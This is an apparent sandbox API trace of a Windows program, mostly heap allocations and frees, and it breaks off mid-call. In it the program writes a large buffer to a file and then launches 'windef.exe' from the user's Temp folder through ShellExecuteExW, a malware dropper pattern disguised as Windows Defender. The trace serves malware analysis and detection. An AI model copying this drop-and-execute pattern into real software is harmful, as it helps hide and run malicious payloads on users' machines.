[0129.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0129.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0129.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0129.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0129.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0129.226] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.226] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.226] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2d0 [0129.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0129.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0129.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0129.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0129.227] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2d0 | out: hHeap=0x12c0000) returned 1 [0129.227] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.227] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.228] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0129.228] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.228] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0129.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0129.228] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0129.229] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0129.229] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0129.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0129.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.229] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0129.229] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.229] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2d0 [0129.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0129.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.230] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0129.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0129.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.230] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x57400) returned 0x14cffb8 [0129.233] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.233] WriteFile (in: hFile=0x2e8, lpBuffer=0x14cffb8*, nNumberOfBytesToWrite=0x57400, lpNumberOfBytesWritten=0x7dfa44, lpOverlapped=0x0 | out: lpBuffer=0x14cffb8*, lpNumberOfBytesWritten=0x7dfa44*=0x57400, lpOverlapped=0x0) returned 1 [0129.310] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0129.310] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14cffb8 | out: hHeap=0x12c0000) returned 1 [0129.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.314] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0129.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2d0 | out: hHeap=0x12c0000) returned 1 [0129.315] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0129.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.315] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff078 [0129.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0129.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0129.315] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0129.315] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0129.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0129.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0129.316] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff078 [0129.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0129.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0129.316] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd670 | out: hHeap=0x12c0000) returned 1 [0129.316] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302370 [0129.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0129.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0129.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0129.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.317] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0129.317] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0129.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0129.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0129.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0129.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0129.318] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.318] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0129.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0129.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0129.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0129.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0129.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0129.319] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0129.319] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0129.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0129.319] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0129.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.320] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dec0 [0129.320] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0129.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0129.320] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0129.321] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.321] CloseHandle (hObject=0x2e8) returned 1 [0129.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5f8 | out: hHeap=0x12c0000) returned 1 [0129.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0129.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bffb0 | out: hHeap=0x12c0000) returned 1 [0129.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0129.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0129.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0129.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2a8 | out: hHeap=0x12c0000) returned 1 [0129.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0129.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0a0 | out: hHeap=0x12c0000) returned 1 [0129.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dec0 | out: hHeap=0x12c0000) returned 1 [0129.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e5c0 | out: hHeap=0x12c0000) returned 1 [0129.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0129.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0129.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0129.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0129.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0129.338] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e180 [0129.338] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0129.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0129.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0129.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0129.339] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1e0 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13165e0 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x50) returned 0x14908e0 [0129.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0129.339] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc0) returned 0x1311b00 [0129.339] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14908e0 | out: hHeap=0x12c0000) returned 1 [0129.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0129.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13165e0 | out: hHeap=0x12c0000) returned 1 [0129.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0129.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0129.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5f8 [0129.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0129.340] ShellExecuteExW (in: pExecInfo=0x7dfa18*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="", lpFile="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x7dfa18*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="", lpFile="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\windef.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3a0)) returned 1 [0129.588] GetProcessId (Process=0x3a0) returned 0x820 [0129.588] CloseHandle (hObject=0x3a0) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5f8 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1311b00 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1e0 | out: hHeap=0x12c0000) returned 1 [0129.589] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0129.589] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0129.589] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff050 | out: hHeap=0x12c0000) returned 1 [0129.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x154cd98 | out: hHeap=0x12c0000) returned 1 [0129.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0129.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0129.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff000 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd448 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff028 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff280 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0129.598] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302370 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff078 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1490200 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.599] HeapFree (in: hHeap=0x12c0000, 